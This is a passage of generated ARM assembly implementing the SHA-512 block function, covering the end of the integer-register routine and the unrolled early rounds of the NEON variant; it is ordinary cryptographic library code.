and r12,r6,r10
orr r6,r6,r10
orr r5,r5,r9 @ Maj(a,b,c).lo
and r6,r6,r11
adds r5,r5,r3
orr r6,r6,r12 @ Maj(a,b,c).hi
sub sp,sp,#8
adc r6,r6,r4 @ h += T
tst r14,#1
add r14,r14,#8
#ifdef __thumb2__
ittt eq @ Thumb2 thing, sanity check in ARM
#endif
ldreq r9,[sp,#184+0]
ldreq r10,[sp,#184+4]
beq .L16_79
bic r14,r14,#1
@ End of one block: add the working variables (register pairs plus the
@ latest frame copies of b,d,f,h) into ctx, unwind the 80*8-byte frame
@ slide, rewind r14 to K512, and loop until r1 reaches the end pointer.
ldr r3,[sp,#8+0]
ldr r4,[sp,#8+4]
ldr r9, [r0,#0+LO]
ldr r10, [r0,#0+HI]
ldr r11, [r0,#8+LO]
ldr r12, [r0,#8+HI]
adds r9,r5,r9
str r9, [r0,#0+LO]
adc r10,r6,r10
str r10, [r0,#0+HI]
adds r11,r3,r11
str r11, [r0,#8+LO]
adc r12,r4,r12
str r12, [r0,#8+HI]
ldr r5,[sp,#16+0]
ldr r6,[sp,#16+4]
ldr r3,[sp,#24+0]
ldr r4,[sp,#24+4]
ldr r9, [r0,#16+LO]
ldr r10, [r0,#16+HI]
ldr r11, [r0,#24+LO]
ldr r12, [r0,#24+HI]
adds r9,r5,r9
str r9, [r0,#16+LO]
adc r10,r6,r10
str r10, [r0,#16+HI]
adds r11,r3,r11
str r11, [r0,#24+LO]
adc r12,r4,r12
str r12, [r0,#24+HI]
ldr r3,[sp,#40+0]
ldr r4,[sp,#40+4]
ldr r9, [r0,#32+LO]
ldr r10, [r0,#32+HI]
ldr r11, [r0,#40+LO]
ldr r12, [r0,#40+HI]
adds r7,r7,r9
str r7,[r0,#32+LO]
adc r8,r8,r10
str r8,[r0,#32+HI]
adds r11,r3,r11
str r11, [r0,#40+LO]
adc r12,r4,r12
str r12, [r0,#40+HI]
ldr r5,[sp,#48+0]
ldr r6,[sp,#48+4]
ldr r3,[sp,#56+0]
ldr r4,[sp,#56+4]
ldr r9, [r0,#48+LO]
ldr r10, [r0,#48+HI]
ldr r11, [r0,#56+LO]
ldr r12, [r0,#56+HI]
adds r9,r5,r9
str r9, [r0,#48+LO]
adc r10,r6,r10
str r10, [r0,#48+HI]
adds r11,r3,r11
str r11, [r0,#56+LO]
adc r12,r4,r12
str r12, [r0,#56+HI]
add sp,sp,#640
sub r14,r14,#640
teq r1,r2
bne .Loop
add sp,sp,#8*9 @ destroy frame
@ Return: ldm into pc on ARMv5+, interworking bx-equivalent otherwise.
#if __ARM_ARCH__>=5
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,pc}
#else
ldmia sp!,{r4,r5,r6,r7,r8,r9,r10,r11,r12,lr}
tst lr,#1
moveq pc,lr @ be binary compatible with V4, yet
.word 0xe12fff1e @ interoperable with Thumb ISA:-)
#endif
.size cryptogams_sha512_block_data_order,.-cryptogams_sha512_block_data_order
#if __ARM_MAX_ARCH__>=7
.arch armv7-a
.fpu neon
.align 4
.globl cryptogams_sha512_block_data_order_neon
.type cryptogams_sha512_block_data_order_neon,%function
cryptogams_sha512_block_data_order_neon:
dmb @ errata #451034 on early Cortex A8
add r2,r1,r2,lsl#7 @ len to point at the end of inp
adr r3,K512
vstmdb sp!,{d8-d15}
vldmia r0,{d16,d17,d18,d19,d20,d21,d22,d23} @ load context
.Loop_neon:
vshr.u64 d24,d20,#14 @ 0
#if 0<16
vld1.64 {d0},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d20,#18
#if 0>0
vadd.i64 d16,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d20,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 0<16 && defined(__ARMEL__)
vrev64.8 d0,d0
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d0
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 1
#if 1<16
vld1.64 {d1},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 1>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 1<16 && defined(__ARMEL__)
vrev64.8 d1,d1
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d1
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 d24,d18,#14 @ 2
#if 2<16
vld1.64 {d2},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d18,#18
#if 2>0
vadd.i64 d22,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d18,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 2<16 && defined(__ARMEL__)
vrev64.8 d2,d2
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d2
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 3
#if 3<16
vld1.64 {d3},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 3>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 3<16 && defined(__ARMEL__)
vrev64.8 d3,d3
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d3
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 d24,d16,#14 @ 4
#if 4<16
vld1.64 {d4},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d16,#18
#if 4>0
vadd.i64 d20,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d16,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 4<16 && defined(__ARMEL__)
vrev64.8 d4,d4
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d4
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 5
#if 5<16
vld1.64 {d5},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 5>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 5<16 && defined(__ARMEL__)
vrev64.8 d5,d5
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d5
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 d24,d22,#14 @ 6
#if 6<16
vld1.64 {d6},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d22,#18
#if 6>0
vadd.i64 d18,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d22,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 6<16 && defined(__ARMEL__)
vrev64.8 d6,d6
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d6
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 7
#if 7<16
vld1.64 {d7},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 7>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 7<16 && defined(__ARMEL__)
vrev64.8 d7,d7
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d7
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
vshr.u64 d24,d20,#14 @ 8
#if 8<16
vld1.64 {d8},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d20,#18
#if 8>0
vadd.i64 d16,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d20,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 8<16 && defined(__ARMEL__)
vrev64.8 d8,d8
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d8
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 9
#if 9<16
vld1.64 {d9},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 9>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 9<16 && defined(__ARMEL__)
vrev64.8 d9,d9
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d9
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 d24,d18,#14 @ 10
#if 10<16
vld1.64 {d10},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d18,#18
#if 10>0
vadd.i64 d22,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d18,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 10<16 && defined(__ARMEL__)
vrev64.8 d10,d10
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d10
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 11
#if 11<16
vld1.64 {d11},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 11>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 11<16 && defined(__ARMEL__)
vrev64.8 d11,d11
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d11
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 d24,d16,#14 @ 12
#if 12<16
vld1.64 {d12},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d16,#18
#if 12>0
vadd.i64 d20,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d16,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 12<16 && defined(__ARMEL__)
vrev64.8 d12,d12
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d12
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 13
#if 13<16
vld1.64 {d13},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 13>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 13<16 && defined(__ARMEL__)
vrev64.8 d13,d13
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d13
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 d24,d22,#14 @ 14
#if 14<16
vld1.64 {d14},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d22,#18
#if 14>0
vadd.i64 d18,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d22,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d22,#50
vsli.64 d25,d22,#46
vmov d29,d22
vsli.64 d26,d22,#23
#if 14<16 && defined(__ARMEL__)
vrev64.8 d14,d14
#endif
veor d25,d24
vbsl d29,d23,d16 @ Ch(e,f,g)
vshr.u64 d24,d18,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d17
vshr.u64 d25,d18,#34
vsli.64 d24,d18,#36
vadd.i64 d27,d26
vshr.u64 d26,d18,#39
vadd.i64 d28,d14
vsli.64 d25,d18,#30
veor d30,d18,d19
vsli.64 d26,d18,#25
veor d17,d24,d25
vadd.i64 d27,d28
vbsl d30,d20,d19 @ Maj(a,b,c)
veor d17,d26 @ Sigma0(a)
vadd.i64 d21,d27
vadd.i64 d30,d27
@ vadd.i64 d17,d30
vshr.u64 d24,d21,#14 @ 15
#if 15<16
vld1.64 {d15},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d21,#18
#if 15>0
vadd.i64 d17,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d21,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d21,#50
vsli.64 d25,d21,#46
vmov d29,d21
vsli.64 d26,d21,#23
#if 15<16 && defined(__ARMEL__)
vrev64.8 d15,d15
#endif
veor d25,d24
vbsl d29,d22,d23 @ Ch(e,f,g)
vshr.u64 d24,d17,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d16
vshr.u64 d25,d17,#34
vsli.64 d24,d17,#36
vadd.i64 d27,d26
vshr.u64 d26,d17,#39
vadd.i64 d28,d15
vsli.64 d25,d17,#30
veor d30,d17,d18
vsli.64 d26,d17,#25
veor d16,d24,d25
vadd.i64 d27,d28
vbsl d30,d19,d18 @ Maj(a,b,c)
veor d16,d26 @ Sigma0(a)
vadd.i64 d20,d27
vadd.i64 d30,d27
@ vadd.i64 d16,d30
mov r12,#4
.L16_79_neon:
subs r12,#1
vshr.u64 q12,q7,#19
vshr.u64 q13,q7,#61
vadd.i64 d16,d30 @ h+=Maj from the past
vshr.u64 q15,q7,#6
vsli.64 q12,q7,#45
vext.8 q14,q0,q1,#8 @ X[i+1]
vsli.64 q13,q7,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q0,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q4,q5,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d20,#14 @ from NEON_00_15
vadd.i64 q0,q14
vshr.u64 d25,d20,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d20,#41 @ from NEON_00_15
vadd.i64 q0,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d20,#50
vsli.64 d25,d20,#46
vmov d29,d20
vsli.64 d26,d20,#23
#if 16<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d21,d22 @ Ch(e,f,g)
vshr.u64 d24,d16,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d23
vshr.u64 d25,d16,#34
vsli.64 d24,d16,#36
vadd.i64 d27,d26
vshr.u64 d26,d16,#39
vadd.i64 d28,d0
vsli.64 d25,d16,#30
veor d30,d16,d17
vsli.64 d26,d16,#25
veor d23,d24,d25
vadd.i64 d27,d28
vbsl d30,d18,d17 @ Maj(a,b,c)
veor d23,d26 @ Sigma0(a)
vadd.i64 d19,d27
vadd.i64 d30,d27
@ vadd.i64 d23,d30
vshr.u64 d24,d19,#14 @ 17
#if 17<16
vld1.64 {d1},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d19,#18
#if 17>0
vadd.i64 d23,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d19,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d19,#50
vsli.64 d25,d19,#46
vmov d29,d19
vsli.64 d26,d19,#23
#if 17<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d20,d21 @ Ch(e,f,g)
vshr.u64 d24,d23,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d22
vshr.u64 d25,d23,#34
vsli.64 d24,d23,#36
vadd.i64 d27,d26
vshr.u64 d26,d23,#39
vadd.i64 d28,d1
vsli.64 d25,d23,#30
veor d30,d23,d16
vsli.64 d26,d23,#25
veor d22,d24,d25
vadd.i64 d27,d28
vbsl d30,d17,d16 @ Maj(a,b,c)
veor d22,d26 @ Sigma0(a)
vadd.i64 d18,d27
vadd.i64 d30,d27
@ vadd.i64 d22,d30
vshr.u64 q12,q0,#19
vshr.u64 q13,q0,#61
vadd.i64 d22,d30 @ h+=Maj from the past
vshr.u64 q15,q0,#6
vsli.64 q12,q0,#45
vext.8 q14,q1,q2,#8 @ X[i+1]
vsli.64 q13,q0,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q1,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q5,q6,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d18,#14 @ from NEON_00_15
vadd.i64 q1,q14
vshr.u64 d25,d18,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d18,#41 @ from NEON_00_15
vadd.i64 q1,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d18,#50
vsli.64 d25,d18,#46
vmov d29,d18
vsli.64 d26,d18,#23
#if 18<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d19,d20 @ Ch(e,f,g)
vshr.u64 d24,d22,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d21
vshr.u64 d25,d22,#34
vsli.64 d24,d22,#36
vadd.i64 d27,d26
vshr.u64 d26,d22,#39
vadd.i64 d28,d2
vsli.64 d25,d22,#30
veor d30,d22,d23
vsli.64 d26,d22,#25
veor d21,d24,d25
vadd.i64 d27,d28
vbsl d30,d16,d23 @ Maj(a,b,c)
veor d21,d26 @ Sigma0(a)
vadd.i64 d17,d27
vadd.i64 d30,d27
@ vadd.i64 d21,d30
vshr.u64 d24,d17,#14 @ 19
#if 19<16
vld1.64 {d3},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d17,#18
#if 19>0
vadd.i64 d21,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d17,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d17,#50
vsli.64 d25,d17,#46
vmov d29,d17
vsli.64 d26,d17,#23
#if 19<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d18,d19 @ Ch(e,f,g)
vshr.u64 d24,d21,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d20
vshr.u64 d25,d21,#34
vsli.64 d24,d21,#36
vadd.i64 d27,d26
vshr.u64 d26,d21,#39
vadd.i64 d28,d3
vsli.64 d25,d21,#30
veor d30,d21,d22
vsli.64 d26,d21,#25
veor d20,d24,d25
vadd.i64 d27,d28
vbsl d30,d23,d22 @ Maj(a,b,c)
veor d20,d26 @ Sigma0(a)
vadd.i64 d16,d27
vadd.i64 d30,d27
@ vadd.i64 d20,d30
vshr.u64 q12,q1,#19
vshr.u64 q13,q1,#61
vadd.i64 d20,d30 @ h+=Maj from the past
vshr.u64 q15,q1,#6
vsli.64 q12,q1,#45
vext.8 q14,q2,q3,#8 @ X[i+1]
vsli.64 q13,q1,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q2,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q6,q7,#8 @ X[i+9]
veor q15,q12
vshr.u64 d24,d16,#14 @ from NEON_00_15
vadd.i64 q2,q14
vshr.u64 d25,d16,#18 @ from NEON_00_15
veor q15,q13 @ sigma0(X[i+1])
vshr.u64 d26,d16,#41 @ from NEON_00_15
vadd.i64 q2,q15
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d16,#50
vsli.64 d25,d16,#46
vmov d29,d16
vsli.64 d26,d16,#23
#if 20<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d17,d18 @ Ch(e,f,g)
vshr.u64 d24,d20,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d19
vshr.u64 d25,d20,#34
vsli.64 d24,d20,#36
vadd.i64 d27,d26
vshr.u64 d26,d20,#39
vadd.i64 d28,d4
vsli.64 d25,d20,#30
veor d30,d20,d21
vsli.64 d26,d20,#25
veor d19,d24,d25
vadd.i64 d27,d28
vbsl d30,d22,d21 @ Maj(a,b,c)
veor d19,d26 @ Sigma0(a)
vadd.i64 d23,d27
vadd.i64 d30,d27
@ vadd.i64 d19,d30
vshr.u64 d24,d23,#14 @ 21
#if 21<16
vld1.64 {d5},[r1]! @ handles unaligned
#endif
vshr.u64 d25,d23,#18
#if 21>0
vadd.i64 d19,d30 @ h+=Maj from the past
#endif
vshr.u64 d26,d23,#41
vld1.64 {d28},[r3,:64]! @ K[i++]
vsli.64 d24,d23,#50
vsli.64 d25,d23,#46
vmov d29,d23
vsli.64 d26,d23,#23
#if 21<16 && defined(__ARMEL__)
vrev64.8 ,
#endif
veor d25,d24
vbsl d29,d16,d17 @ Ch(e,f,g)
vshr.u64 d24,d19,#28
veor d26,d25 @ Sigma1(e)
vadd.i64 d27,d29,d18
vshr.u64 d25,d19,#34
vsli.64 d24,d19,#36
vadd.i64 d27,d26
vshr.u64 d26,d19,#39
vadd.i64 d28,d5
vsli.64 d25,d19,#30
veor d30,d19,d20
vsli.64 d26,d19,#25
veor d18,d24,d25
vadd.i64 d27,d28
vbsl d30,d21,d20 @ Maj(a,b,c)
veor d18,d26 @ Sigma0(a)
vadd.i64 d22,d27
vadd.i64 d30,d27
@ vadd.i64 d18,d30
vshr.u64 q12,q2,#19
vshr.u64 q13,q2,#61
vadd.i64 d18,d30 @ h+=Maj from the past
vshr.u64 q15,q2,#6
vsli.64 q12,q2,#45
vext.8 q14,q3,q4,#8 @ X[i+1]
vsli.64 q13,q2,#3
veor q15,q12
vshr.u64 q12,q14,#1
veor q15,q13 @ sigma1(X[i+14])
vshr.u64 q13,q14,#8
vadd.i64 q3,q15
vshr.u64 q15,q14,#7
vsli.64 q12,q14,#63
vsli.64 q13,q14,#56
vext.8 q14,q7,q0,#8 @ X[i+9]
veor q15,q12
